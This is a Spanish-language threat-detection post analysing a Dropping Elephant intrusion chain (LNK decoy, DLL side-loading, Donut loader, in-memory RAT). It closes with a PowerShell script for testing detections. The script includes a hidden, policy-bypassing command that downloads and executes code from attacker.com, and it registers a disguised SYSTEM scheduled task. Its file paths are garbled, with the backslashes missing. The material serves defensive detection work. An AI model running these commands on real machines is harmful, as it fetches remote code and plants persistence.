SOC Prime Bias: Crítico

19 Jun 2026 07:55 UTC

Malware à la Mode: Dentro de la Cadena de Carga de Dropping Elephant

Author Photo
SOC Prime Team linkedin icon Seguir
Malware à la Mode: Dentro de la Cadena de Carga de Dropping Elephant
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una campaña sofisticada atribuida a Dropping Elephant utiliza documentos señuelo con temática de China para desplegar un troyano de acceso remoto actualizado, residente en memoria. La intrusión se basa en la carga lateral de DLL a través de un binario legítimo de Microsoft y el cargador de shellcode Donut para evitar la detección basada en disco. La carga útil final también utiliza métodos avanzados de evasión, incluyendo la aplanación del flujo de control y la reconstrucción de API en tiempo de ejecución.

Investigación

Los investigadores de Rapid7 descubrieron la amenaza durante una búsqueda proactiva que comenzó con un acceso directo malicioso de Windows disfrazado de documento PDF. Su investigación siguió la cadena de carga útil desde la puesta en escena inicial en chinagreenenergy[.]org a través de la carga lateral de DLL de APPWIZ.cpl hasta la ejecución de un RAT en memoria. El análisis a nivel de código con Diaphora confirmó un linaje común con muestras anteriores de Dropping Elephant a pesar de la extensa reformulación.

Mitigación

Los defensores deben priorizar las detecciones de comportamiento, como los archivos de acceso directo que inician PowerShell y la puesta en escena sospechosa de cargas útiles en C:UsersPublic. También es importante monitorear las tareas programadas con nombres inusuales e identificar la carga lateral de DLL desde directorios inesperados. Además, las defensas de endpoints necesitan visibilidad a nivel de memoria para detectar manipulación con AMSI, WLDP y ETW.

Respuesta

Si se detecta esta actividad, aísle inmediatamente los sistemas afectados para interrumpir el tráfico de comando y control adicional. Realice análisis forense de memoria para identificar el RAT inyectado e inspeccione las tareas programadas para detectar persistencia. También deben revisarse los registros de red en busca de tráfico HTTPS no autorizado hacia los dominios de C2 conocidos y cualquier indicio de exfiltración de archivos.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: La Telemetría y la Verificación Previa al Vuelo deben haber pasado.

Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa del Ataque y Comandos: El adversario pretende establecer persistencia y ejecutar un descargador. Para evitar los filtros de correo electrónico estándar, utilizan un archivo de acceso directo llamado GRES3001.lnk que aparece como un PDF. Al hacer clic, llama a conhost.exe para ejecutar un script de PowerShell. Simultáneamente, establecen persistencia creando una tarea programada llamada GoogleErrorReport que está diseñada para ejecutar Fondue.exe desde un directorio público, disfrazándose como un reportero de errores de Google legítimo para evitar una inspección casual.

  • Script de Prueba de Regresión:

    # 1. Simular el comportamiento del Acceso Directo/Conhost
    # Simulamos la ejecución de conhost.exe con la cadena específica en la línea de comandos
    Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" 
    # Nota: Para coincidir estrictamente con 'CommandLine contains GRES3001.lnk' de la regla, simulamos la llamada al proceso como si viniera de ese archivo.
    # Dado que no podemos suplantar fácilmente el nombre del proceso padre en un simple script, simulamos la cadena de línea de comandos esperada.
    Write-Host "[!] Simulando desencadenante GRES3001.lnk..."
    $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'"
    # En un entorno real, el campo 'CommandLine' en Sysmon contendría la cadena objetivo.
    
    # 2. Simular la Tarea Programada y carga lateral de Fondue.exe
    Write-Host "[!] Simulando la tarea programada GoogleErrorReport..."
    New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force
    Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload"
    
    $TaskName = "GoogleErrorReport"
    $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe"
    Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Simulated Dropping Elephant Task" -User "SYSTEM" -Force
    
    Write-Host "[+] Simulación Completa. Verifique SIEM para alertas."
  • Comandos de Limpieza:

    # Eliminar el binario de malware simulado
    Remove-Item -Path "C:UsersPublicFondue.exe" -Force
    
    # Eliminar la tarea programada maliciosa
    Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false
    
    Write-Host "[+] Limpieza Completa."